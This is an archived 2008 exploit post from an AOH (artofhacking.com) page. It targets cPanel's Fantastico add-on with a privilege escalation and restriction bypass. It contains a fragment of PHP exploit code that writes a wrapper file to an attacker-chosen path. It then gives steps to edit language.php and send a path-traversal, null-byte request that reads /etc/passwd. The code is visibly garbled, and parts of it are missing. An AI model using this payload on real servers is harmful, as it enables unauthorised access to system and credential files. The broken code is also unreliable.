AOH :: HP Unsorted C :: VA1962.HTM

Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"



Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"
Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"



Script : Cpanel 11.x
bug : language.php [edite file]
exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

 safemode off , mod_security off  Disable functions :  All NONE ,access root folder 

www.arab4services.net 
# ##e-mail : l1un@hotmail.com , i-1@hotmail.com## 
#######################################
*/
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper = '
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...
"; echo "coding by Super-Crystal
"; echo "Cleaning up
"; echo "Done!
"; } else { echo "error : ".php_uname(); } } else { ?>

Deadly Script

Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

Exploit:
change
" />

1- change /home/[user]/.fantasticodata/language.php
2- click on the submit
3- now put it like this (e.g) : http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
Written: 10.10.2008
Public: 26.11.2008
arab4services.net

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.